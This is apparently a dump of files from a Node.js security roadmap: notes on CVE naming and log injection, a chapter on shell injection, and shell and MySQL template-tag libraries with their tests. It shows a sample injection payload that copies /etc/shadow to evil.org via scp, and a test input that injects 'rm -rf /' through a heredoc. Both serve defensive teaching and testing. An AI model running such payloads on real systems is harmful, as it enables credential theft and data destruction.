 26 | ## Problem
 27 | 
 28 | Threats: [0DY][]
 29 | 
 30 | Node's security working group is working on a lot of preparedness
 31 | issues so we only address a few.
 32 | 
 33 | ### Naming is hard
 34 | 
 35 | Each of the groups mentioned above is doing great work trying to help
 36 | patches get to those who need them.  Each seems to be rolling their own
 37 | naming scheme for vulnerabilities.
 38 | 
 39 | The computer security community has a
 40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that
 41 | reports don't fall through the cracks.  Security responders rarely
 42 | have the luxury of dealing with a single stack much less a single
 43 | layer of that stack so mailing lists are not sufficient &mdash; if
 44 | reporters roll their own naming scheme or only disclose via
 45 | unstructured text, reports will fall through the cracks.
 46 | 
 47 | ### Logging
 48 | 
 49 | When trying to diagnose a problem, responders often look to log files.
 50 | There has been much written on how to protect logs from
 51 | [forgery][log injection].
 52 | 
 53 | ```js
 54 | console.log(s);
 55 | ```
 56 | 
 57 | on a stock node runtime allows an attacker who controls `s` to write
 58 | any content to a log.
 59 | 
 60 | ```js
 61 | console.log('MyModule: ' + s);
 62 | ```
 63 | 
 64 | is a bit better.  An attacker has to insert a newline character into
 65 | `s` to forge another module's log prefix, and can't get rid of the
 66 | previous one.
 67 | 
 68 | 
 69 | ## Success Criteria
 70 | 
 71 | Incident responders would have the tools necessary to do their jobs if
 72 | 
 73 | *  Security specialists can subscribe to a stream of notifications
 74 |    that include the vast majority of actionable security disclosures.
 75 | *  Responders can narrow down which code generated which log entries.
 76 | 
 77 | 
 78 | ## Possible solutions
 79 | 
 80 | ### Naming
 81 | 
 82 | Use CVE-IDs if at all possible when disclosing a vulnerability.  There
 83 | is a CNA for Node.js but that doesn't cover non-core npm modules and
 84 | other CNAs cover runtime dependencies like OpenSSL.  If there is no
 85 | other CNA that is appropriate, MITRE will issue an ID.
 86 | 
 87 | ### Logging
 88 | 
 89 | On module load, the builtin `module.js` creates a new version of
 90 | `require` for each module so that it can make sure that the module path
 91 | gets passed as the module parent parameter.
 92 | 
 93 | The same mechanism could create a distinct `console` logger for each
 94 | module that narrows down the source of a message, and makes it
 95 | unambiguous where one message ends and the next starts.  For example:
 96 | 
 97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'`
 98 |    and emit a CRLF after the log message to prevent forgery by
 99 |    line splitting.
100 | 2. Prefix it with the module filename and a colon.
101 | 
102 | With this, an incident responder reading a log message can reliably
103 | tell that the module mentioned is where the log message originated, as
104 | long as the attacker didn't get write access to the log file.
105 | Preventing log deletion by other processes is better handled by
106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node.
107 | 
108 | [nodesecurity]: https://nodesecurity.io/advisories
109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe
110 | [snyk]: https://snyk.io/vuln?packageManager=npm
111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec
112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
113 | [log injection]: https://www.owasp.org/index.php/Log_Injection
114 | [0DY]: ../chapter-1/threat-0DY.md
115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
116 | [security-wg]: https://github.com/nodejs/security-wg
117 | 


--------------------------------------------------------------------------------
/chapter-7/child-processes.md:
--------------------------------------------------------------------------------
 1 | # Shell injection
 2 | 
 3 | Threats: [SHP][]
 4 | 
 5 | The [`shelljs` module][shelljs] allows access to the system
 6 | shell.  We focus on `shelljs`, but similar arguments apply to builtins
 7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
 8 | similar modules.
 9 | 
10 | `shelljs` has some nice programmatic APIs for common shell commands
11 | that escape arguments.
12 | 
13 | It also provides `shell.exec` which allows full access to the shell
14 | including interpretation of shell meta characters.
15 | 
16 | Solving [shell injection][SHP] is a much harder problem than query
17 | injection since shell scripts tend to call other shell scripts, so
18 | properly escaping arguments to one script doesn't help if the script
19 | sloppily composes a sub-shell.  The problem of tools that trust their
20 | inputs is not limited to shell scripts: see discussion of image decoders
21 | in [BOF][].
22 | 
23 | The [shell grammar][] has more layers of interpretation so is arguably
24 | more complex than any one SQL grammar.
25 | 
26 | We can do much better than string concatenation though.  The code
27 | below is vulnerable.
28 | 
29 | ```js
30 | shelljs.exec("executable '" + x + "'")
31 | ```
32 | 
33 | If an attacker causes
34 | 
35 | ```js
36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' ";
37 | ```
38 | 
39 | then what gets passed to the shell is
40 | 
41 | ```js
42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' '
43 | ```
44 | 
45 | Instead, consider:
46 | 
47 | ```js
48 | shelljs.exec`executable ${x}`
49 | 
50 | shelljs.exec`executable '${x}'`
51 | ```
52 | 
53 | This use of tagged templates is roughly equivalent to
54 | 
55 | ```js
56 | shelljs.exec(["executable ", ""], x)
57 | 
58 | shelljs.exec(["executable \'", "\'"], x)
59 | ```
60 | 
61 | This way, when control reaches `shelljs`, it knows which strings came
62 | from the developer: `["executable ", ""]`, and which are inline
63 | expressions: `x`.  If `shelljs` properly escapes the latter, it
64 | prevents the breach above.
65 | 
66 | The accompanying example ([code][sh-code]) includes a tag
67 | implementation for `sh` and `bash` that recognizes complex nesting
68 | semantics.
69 | 
70 | We can't, working within the confines of Node, prevent poorly written
71 | command line tools from breaking when exposed to untrusted inputs, but
72 | we can make sure that we preserve the developer's intent when they
73 | write code that invokes command line tools.  For projects that have
74 | legitimate reasons for invoking sub-shells, consistently using
75 | template tags like this solves some problems and makes it more likely
76 | that effort spent hardening command line tools will yield fruit.
77 | 
78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
79 | [shelljs]: https://www.npmjs.com/package/shelljs
80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
81 | [SHP]: ../chapter-1/threat-SHP.md
82 | [BOF]: ../chapter-1/threat-BOF.md
83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag
84 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sh/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "sh-template-tag",
 3 |   "description": "string template tags for safely composing shell strings",
 4 |   "keywords": [
 5 |     "shell",
 6 |     "child_process",
 7 |     "security",
 8 |     "injection",
 9 |     "template",
10 |     "template-tag",
11 |     "string-template",
12 |     "sec-roadmap",
13 |     "es6"
14 |   ],
15 |   "version": "0.0.0",
16 |   "author": "Mike Samuel",
17 |   "license": "Apache-2.0",
18 |   "main": "index.js",
19 |   "files": [
20 |     "index.js"
21 |   ],
22 |   "dependencies": {
23 |     "template-tag-common": ">=1.0.2"
24 |   },
25 |   "devDependencies": {
26 |     "chai": ">=4.1.2",
27 |     "eslint": ">=4.15.0",
28 |     "eslint-config-strict": "*",
29 |     "eslint-config-standard": "*",
30 |     "mocha": ">=4.0.1",
31 |     "standard": "*"
32 |   },
33 |   "scripts": {
34 |     "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
35 |   },
36 |   "eslintConfig": {
37 |     "extends": [
38 |       "strict",
39 |       "standard"
40 |     ]
41 |   }
42 | }
43 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sh/test/test.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | /* eslint "id-length": off */
 19 | 
 20 | const { expect } = require('chai')
 21 | const { describe, it } = require('mocha')
 22 | const { sh, ShFragment, makeLexer } = require('../index')
 23 | 
 24 | /**
 25 |  * Feeds each chunk to a fresh lexer and comma-joins element 0 of every
 26 |  * result, substituting '_' when it is falsy.  Finally calls lexer(null),
 27 |  * presumably the end-state check, and appends '_ERR_' if that throws.
 28 |  */
 29 | function tokens (...chunks) {
 30 |   const lexer = makeLexer()
 31 |   const out = []
 32 |   for (let i = 0, len = chunks.length; i < len; ++i) {
 33 |     out.push(lexer(chunks[i])[0] || '_')
 34 |   }
 35 |   try {
 36 |     lexer(null)
 37 |   } catch (exc) {
 38 |     out.push('_ERR_')
 39 |   }
 40 |   return out.join(',')
 41 | }
 42 | 
 43 | // Returns String(x) for an ShFragment; throws an Error for anything else.
 44 | function unwrap (x) {
 45 |   if (x instanceof ShFragment) {
 46 |     return String(x)
 47 |   }
 48 |   throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
 49 | }
 50 | 
 51 | // Run a test 3 times to exercise memoization; golden '_ERR_' expects a throw.
 52 | function runShTest (golden, test) {
 53 |   for (let i = 3; --i >= 0;) {
 54 |     if (golden === '_ERR_') {
 55 |       expect(test).to.throw()
 56 |     } else {
 57 |       expect(unwrap(test())).to.equal(golden)
 58 |     }
 59 |   }
 60 | }
 61 | 
 62 | describe('sh template tags', () => {
 63 |   describe('lexer', () => {
 64 |     it('empty string', () => {
 65 |       expect(tokens('')).to.equal('_')
 66 |     })
 67 |     it('word', () => {
 68 |       expect(tokens('foo')).to.equal('_')
 69 |     })
 70 |     it('words', () => {
 71 |       expect(tokens('foo bar baz')).to.equal('_')
 72 |     })
 73 |     it('words split', () => {
 74 |       expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
 75 |     })
 76 |     it('parens', () => {
 77 |       expect(tokens('foo (bar) baz')).to.equal('_')
 78 |     })
 79 |     it('parens split', () => {
 80 |       expect('_,_,(,_,_,_').to.equal(
 81 |         tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
 82 |     })
 83 |     it('parens hanging split', () => {
 84 |       expect('_,_,(,(,(,_ERR_').to.equal(
 85 |         tokens('foo', ', ', '(bar', ' ', 'baz'))
 86 |     })
 87 |     it('quotes embed subshell', () => {
 88 |       expect('",$(,_').to.equal(
 89 |         tokens(' "foo', '$(bar ', ' baz)" boo'))
 90 |     })
 91 |     it('quotes embed arithshell', () => {
 92 |       expect('",$((,$((,",_').to.equal(
 93 |         tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
 94 |     })
 95 |     it('quotes embed backticks', () => {
 96 |       expect('",`,`,",_').to.equal(
 97 |         tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
 98 |     })
 99 |     it('escape affects subshell', () => {
100 |       expect('",",",",_').to.equal(
101 |         tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
102 |     })
103 |     it('single quotes do not embed', () => {
104 |       expect(`',',',',_`).to.equal(
105 |         tokens(
106 |           ' \' $(',
107 |           'foo) $((',
108 |           'bar))',
109 |           ' `',
110 |           ' ` # \' '))
111 |     })
112 |     it('unterminated comment', () => {
113 |       expect('#,_ERR_').to.equal(
114 |         tokens(' #foo'))
115 |     })
116 |     it('terminated comment', () => {
117 |       expect('_').to.equal(
118 |         tokens(' #foo\n'))
119 |     })
120 |     it('terminated comment split', () => {
121 |       expect('#,_').to.equal(
122 |         tokens(' #foo', 'bar\n'))
123 |     })
124 |     it('arithshell', () => {
125 |       expect('_,$((,$((,_,_').to.equal(
126 |         tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
127 |     })
128 |     it('backticks', () => {
129 |       expect('_,`,`,_,_').to.equal(
130 |         tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
131 |     })
132 |     it('subshell paren disambiguation', () => {
133 |       expect('$(,(,$(,",_,_').to.equal(tokens(
134 |         'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
135 |     })
136 |     it('hash not after space', () => {
137 |       expect('_,_').to.equal(
138 |         tokens('echo foo#', ''))
139 |     })
140 |     it('hash after space', () => {
141 |       expect('#,#,_ERR_').to.equal(
142 |         tokens('echo foo #', ''))
143 |     })
144 |     it('hash concatenation hazard', () => {
145 |       expect(() => tokens('#foo')).to.throw()
146 |     })
147 |     it('intermediate concatenation hazard', () => {
148 |       expect(() => tokens('echo foo', '#bar')).to.throw()
149 |     })
150 |     it('escaped intermediate concatenation hazard', () => {
151 |       expect('_,_').to.equal(tokens(
152 |         'echo foo', '\\#bar'))
153 |     })
154 |     it('simple heredoc', () => {
155 |       expect(tokens('cat <<EOF\nFoo bar\nEOF\n')).to.equal('_')
156 |     })
157 |     it('heredoc hazard', () => {
158 |       // Concatenation hazard when no eol at end
159 |       expect(tokens('cat <<EOF\nFoo bar\nEOF')).to.equal('<<EOF,_ERR_')
160 |     })
161 |     it('split heredoc', () => {
162 |       expect(tokens('cat <<EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
163 |     })
164 |     it('split heredoc sp', () => {
165 |       expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
166 |     })
167 |     it('split heredoc-', () => {
168 |       expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
169 |     })
170 |     it('bad heredoc label', () => {
171 |       expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
172 |     })
173 |     it('missing heredoc label', () => {
174 |       expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
175 |     })
176 |   })
177 | 
178 |   const str = 'a"\'\n\\$b'
179 |   const numb = 1234
180 |   const frag = new ShFragment(' frag ')
181 |   describe('template tag', () => {
182 |     it('string in top level', () => {
183 |       runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
184 |     })
185 |     it('number in top level', () => {
186 |       runShTest(`echo '1234'`, () => sh`echo ${numb}`)
187 |     })
188 |     it('fragment in top level', () => {
189 |       runShTest(`echo  frag `, () => sh`echo ${frag}`)
190 |     })
191 |     it('string in dq', () => {
192 |       runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
193 |     })
194 |     it('number in dq', () => {
195 |       runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
196 |     })
197 |     it('fragment in dq', () => {
198 |       runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
199 |     })
200 |     it('string in sq', () => {
201 |       runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
202 |     })
203 |     it('number in sq', () => {
204 |       runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
205 |     })
206 |     it('fragment in sq', () => {
207 |       runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
208 |     })
209 |     it('string in embed', () => {
210 |       runShTest(
211 |         `echo $(echo 'a"'"'"'\n\\$b')`,
212 |         () => sh`echo $(echo ${str})`)
213 |     })
214 |     it('number in embed', () => {
215 |       runShTest(
216 |         `echo $(echo '1234')`,
217 |         () => sh`echo $(echo ${numb})`)
218 |     })
219 |     it('fragment in embed', () => {
220 |       runShTest(
221 |         `echo $(echo  frag )`,
222 |         () => sh`echo $(echo ${frag})`)
223 |     })
224 |     it('hash ambig string', () => {
225 |       runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
226 |     })
227 |     it('hash ambig fragment', () => {
228 |       runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
229 |     })
230 |     it('heredoc string', () => {
231 |       runShTest(
232 |         '\ncat <<EOF\na"\'\n\\$b\nEOF\n',
233 |         () => sh`
234 | cat <<EOF
235 | ${str}
236 | EOF
237 | `)
238 |     })
239 |     it('heredoc number', () => {
240 |       runShTest(
241 |         '\ncat <<EOF\n1234\nEOF\n',
242 |         () => sh`
243 | cat <<EOF
244 | ${numb}
245 | EOF
246 | `)
247 |     })
248 |     it('heredoc fragment', () => {
249 |       runShTest(
250 |         '\ncat <<EOF\n frag \nEOF\n',
251 |         () => sh`
252 | cat <<EOF
253 | ${frag}
254 | EOF
255 | `)
256 |     })
257 |     it('heredoc sneaky', () => {
258 |       runShTest(
259 |         `
260 | cat <<EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
261 | EOF
262 | rm -rf /
263 | cat <<EOF
264 | EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
265 | `,
266 | 
267 |         () => sh`
268 | cat <<EOF
269 | ${'EOF\nrm -rf /\ncat <<EOF'}
270 | EOF
271 | `)
272 |     })
273 |   })
274 | })
275 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/index.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | const mysql = require('mysql')
 19 | const {
 20 |   memoizedTagFunction,
 21 |   trimCommonWhitespaceFromLines,
 22 |   TypedString
 23 | } = require('template-tag-common')
 24 | 
 25 | // A simple lexer for SQL.
 26 | // SQL has many divergent dialects with subtly different
 27 | // conventions for string escaping and comments.
 28 | // This just attempts to roughly tokenize MySQL's specific variant.
 29 | // See also
 30 | // https://www.w3.org/2005/05/22-SPARQL-MySQL/sql_yacc
 31 | // https://github.com/twitter/mysql/blob/master/sql/sql_lex.cc
 32 | // https://dev.mysql.com/doc/refman/5.7/en/string-literals.html
 33 | 
 34 | // "--" followed by whitespace starts a line comment
 35 | // "#" starts a line comment
 36 | // "/*" starts an inline comment ended at first "*/"
 37 | // \N means null
 38 | // Prefixed strings x'...' is a hex string,  b'...' is a binary string, ....
 39 | // '...', "..." are strings.  `...` escapes identifiers.
 40 | // doubled delimiters and backslash both escape
 41 | // doubled delimiters work in `...` identifiers
 42 | 
 43 | const PREFIX_BEFORE_DELIMITER = new RegExp(
 44 |   '^(?:' +
 45 |     (
 46 |       // A whole comment, in any of the three forms
 47 |       '--(?=[\\t\\r\\n ])[^\\r\\n]*' + // "--" before whitespace, to end of line
 48 |       '|#[^\\r\\n]*' + // "#" to end of line
 49 |       '|/[*][\\s\\S]*?[*]/' // "/*" through the first "*/"
 50 |     ) +
 51 |     '|' +
 52 |     (
 53 |       // A character other than ' " ` - / #, or a "-" not before "-", or a "/" not before "*"
 54 |       '(?:[^\'"`\\-/#]|-(?!-)|/(?![*]))'
 55 |     ) +
 56 |     ')*')
 57 | const DELIMITED_BODIES = { // Keyed by opening quote; each pattern matches the body after that quote
 58 |   '\'': /^(?:[^'\\]|\\[\s\S]|'')*/, // a body is non-quote chars, backslash pairs, and doubled quotes
 59 |   '"': /^(?:[^"\\]|\\[\s\S]|"")*/,
 60 |   '`': /^(?:[^`\\]|\\[\s\S]|``)*/
 61 | }
 62 | 
 63 | /** Template tag that creates a new Error with a message. */
 64 | function msg (strs, ...dyn) {
 65 |   let message = String(strs[0])
 66 |   for (let i = 0; i < dyn.length; ++i) {
 67 |     message += JSON.stringify(dyn[i]) + strs[i + 1]
 68 |   }
 69 |   return message
 70 | }
 71 | 
 72 | /**
 73 |  * Returns a function that can be fed chunks of input and which
 74 |  * returns a delimiter context.
 75 |  */
 76 | function makeLexer () {
 77 |   let errorMessage = null
 78 |   let delimiter = null
 79 |   return (text) => {
 80 |     if (errorMessage) {
 81 |       // Replay the error message if we've already failed.
 82 |       throw new Error(errorMessage)
 83 |     }
 84 |     text = String(text)
 85 |     while (text) {
 86 |       const pattern = delimiter
 87 |         ? DELIMITED_BODIES[delimiter]
 88 |         : PREFIX_BEFORE_DELIMITER
 89 |       const match = pattern.exec(text)
 90 |       if (!match) {
 91 |         throw new Error(
 92 |           errorMessage = msg`Failed to lex starting at ${text}`)
 93 |       }
 94 |       let nConsumed = match[0].length
 95 |       if (text.length > nConsumed) {
 96 |         const chr = text.charAt(nConsumed)
 97 |         if (delimiter) {
 98 |           if (chr === delimiter) {
 99 |             delimiter = null
100 |             ++nConsumed
101 |           } else {
102 |             throw new Error(
103 |               errorMessage = msg`Expected ${chr} at ${text}`)
104 |           }
105 |         } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
106 |           delimiter = chr
107 |           ++nConsumed
108 |         } else {
109 |           throw new Error(
110 |             errorMessage = msg`Expected delimiter at ${text}`)
111 |         }
112 |       }
113 |       text = text.substring(nConsumed)
114 |     }
115 |     return delimiter
116 |   }
117 | }
118 | 
119 | /** A string wrapper that marks its content as a SQL identifier. */
120 | class Identifier extends TypedString {}
121 | 
122 | /**
123 |  * A string wrapper that marks its content as a series of
124 |  * well-formed SQL tokens.
125 |  */
126 | class SqlFragment extends TypedString {}
127 | 
128 | /**
129 |  * Analyzes the static parts of the tag content.
130 |  *
131 |  * @return An record like { delimiters, chunks }
132 |  *     where delimiter is a contextual cue and chunk is
133 |  *     the adjusted raw text.
134 |  */
135 | function computeStatic (strings) {
136 |   const { raw } = trimCommonWhitespaceFromLines(strings)
137 | 
138 |   const delimiters = []
139 |   const chunks = []
140 | 
141 |   const lexer = makeLexer()
142 | 
143 |   let delimiter = null
144 |   for (let i = 0, len = raw.length; i < len; ++i) {
145 |     let chunk = String(raw[i])
146 |     if (delimiter === '`') {
147 |       // Treat raw \` in an identifier literal as an ending delimiter.
148 |       chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
149 |     }
150 |     const newDelimiter = lexer(chunk)
151 |     if (newDelimiter === '`' && !delimiter) {
152 |       // Treat literal \` outside a string context as starting an
153 |       // identifier literal
154 |       chunk = chunk.replace(
155 |         /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
156 |     }
157 | 
158 |     chunks.push(chunk)
159 |     delimiters.push(newDelimiter)
160 |     delimiter = newDelimiter
161 |   }
162 | 
163 |   if (delimiter) {
164 |     throw new Error(`Unclosed quoted string: ${delimiter}`)
165 |   }
166 | 
167 |   return { raw, delimiters, chunks }
168 | }
169 | 
170 | function interpolateSqlIntoFragment (
171 |   { raw, delimiters, chunks }, strings, values) {
172 |   // A buffer to accumulate output.
173 |   let [ result ] = chunks
174 |   for (let i = 1, len = raw.length; i < len; ++i) {
175 |     const chunk = chunks[i]
176 |     // The count of values must be 1 less than the surrounding
177 |     // chunks of literal text.
178 |     if (i !== 0) {
179 |       const delimiter = delimiters[i - 1]
180 |       const value = values[i - 1]
181 |       if (delimiter) {
182 |         result += escapeDelimitedValue(value, delimiter)
183 |       } else {
184 |         result = appendValue(result, value, chunk)
185 |       }
186 |     }
187 | 
188 |     result += chunk
189 |   }
190 | 
191 |   return new SqlFragment(result)
192 | }
193 | 
194 | function escapeDelimitedValue (value, delimiter) {
195 |   if (delimiter === '`') {
196 |     return mysql.escapeId(String(value)).replace(/^`|`$/g, '')
197 |   }
198 |   const escaped = mysql.escape(String(value))
199 |   return escaped.substring(1, escaped.length - 1)
200 | }
201 | 
202 | function appendValue (resultBefore, value, chunk) {
203 |   let needsSpace = false
204 |   let result = resultBefore
205 |   const valueArray = Array.isArray(value) ? value : [ value ]
206 |   for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
207 |     if (i) {
208 |       result += ', '
209 |     }
210 | 
211 |     const one = valueArray[i]
212 |     let valueStr = null
213 |     if (one instanceof SqlFragment) {
214 |       if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) {
215 |         result += ' '
216 |       }
217 |       valueStr = one.toString()
218 |       needsSpace = i + 1 === nValues
219 |     } else if (one instanceof Identifier) {
220 |       valueStr = mysql.escapeId(one.toString())
221 |     } else {
222 |       // If we need to handle nested arrays, we would recurse here.
223 |       valueStr = mysql.format('?', one)
224 |     }
225 |     result += valueStr
226 |   }
227 | 
228 |   if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) {
229 |     result += ' '
230 |   }
231 | 
232 |   return result
233 | }
234 | 
235 | /**
236 |  * Template tag function that contextually autoescapes values
237 |  * producing a SqlFragment.
238 |  */
239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)
240 | 
241 | exports.Identifier = Identifier
242 | exports.SqlFragment = SqlFragment
243 | exports.sql = sql
244 | 
245 | if (global.it) {
246 |   // Expose for testing.
247 |   // Harmless if this leaks
248 |   exports.makeLexer = makeLexer
249 | }
250 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "mysql-template-tag",
 3 |   "description": "string template tags for safely composing SQL",
 4 |   "keywords": [
 5 |     "sql",
 6 |     "security",
 7 |     "injection",
 8 |     "template",
 9 |     "template-tag",
10 |     "string-template",
11 |     "sec-roadmap",
12 |     "es6"
13 |   ],
14 |   "version": "0.0.0",
15 |   "author": "Mike Samuel",
16 |   "license": "Apache-2.0",
17 |   "main": "index.js",
18 |   "files": [
19 |     "index.js"
20 |   ],
21 |   "dependencies": {
22 |     "mysql": "2.15.0",
23 |     "template-tag-common": ">=1.0.2"
24 |   },
25 |   "devDependencies": {
26 |     "chai": ">=4.1.2",
27 |     "eslint": ">=4.15.0",
28 |     "eslint-config-strict": "*",
29 |     "eslint-config-standard": "*",
30 |     "mocha": ">=4.0.1",
31 |     "standard": "*"
32 |   },
33 |   "scripts": {
34 |     "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
35 |   },
36 |   "eslintConfig": {
37 |     "extends": [
38 |       "strict",
39 |       "standard"
40 |     ]
41 |   }
42 | }
43 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/test/test.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | /* eslint "no-magic-numbers": off */
 19 | 
 20 | const { expect } = require('chai')
 21 | const { describe, it } = require('mocha')
 22 | const index = require('../index')
 23 | 
 24 | function tokens (...chunks) {
 25 |   const lexer = index.makeLexer()
 26 |   const out = []
 27 |   for (let i = 0, len = chunks.length; i < len; ++i) {
 28 |     out.push(lexer(chunks[i]) || '_')
 29 |   }
 30 |   return out.join(',')
 31 | }
 32 | 
 33 | describe('sql template tags', () => {
 34 |   describe('lexer', () => {
 35 |     it('empty string', () => {
 36 |       expect(tokens('')).to.equal('_')
 37 |     })
 38 |     it('hash comments', () => {
 39 |       expect(tokens(' # "foo\n', '')).to.equal('_,_')
 40 |     })
 41 |     it('dash comments', () => {
 42 |       expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
 43 |     })
 44 |     it('block comments', () => {
 45 |       expect(tokens(' /* `foo */', '')).to.equal('_,_')
 46 |     })
 47 |     it('dq', () => {
 48 |       expect(tokens('SELECT "foo"')).to.equal('_')
 49 |       expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
 50 |       expect(tokens('SELECT "', '"')).to.equal('",_')
 51 |       expect(tokens('SELECT "x', '"')).to.equal('",_')
 52 |       expect(tokens('SELECT "\'', '"')).to.equal('",_')
 53 |       expect(tokens('SELECT "`', '"')).to.equal('",_')
 54 |       expect(tokens('SELECT """', '"')).to.equal('",_')
 55 |       expect(tokens('SELECT "\\"', '"')).to.equal('",_')
 56 |     })
 57 |     it('sq', () => {
 58 |       expect(tokens('SELECT \'foo\'')).to.equal('_')
 59 |       expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
 60 |       expect(tokens('SELECT \'', '\'')).to.equal('\',_')
 61 |       expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
 62 |       expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
 63 |       expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
 64 |       expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
 65 |       expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
 66 |     })
 67 |     it('bq', () => {
 68 |       expect(tokens('SELECT `foo`')).to.equal('_')
 69 |       expect(tokens('SELECT "foo", `foo`')).to.equal('_')
 70 |       expect(tokens('SELECT `', '`')).to.equal('`,_')
 71 |       expect(tokens('SELECT `x', '`')).to.equal('`,_')
 72 |       expect(tokens('SELECT `\'', '`')).to.equal('`,_')
 73 |       expect(tokens('SELECT `"', '`')).to.equal('`,_')
 74 |       expect(tokens('SELECT ```', '`')).to.equal('`,_')
 75 |       expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
 76 |     })
 77 |   })
 78 | 
 79 |   function runTagTest (golden, test) {
 80 |     // Run multiply to test memoization bugs.
 81 |     for (let i = 3; --i >= 0;) {
 82 |       let result = test()
 83 |       if (result instanceof index.SqlFragment) {
 84 |         result = result.toString()
 85 |       } else {
 86 |         throw new Error(`Expected SqlFragment not ${result}`)
 87 |       }
 88 |       expect(result).to.equal(golden)
 89 |     }
 90 |   }
 91 | 
 92 |   describe('sql', () => {
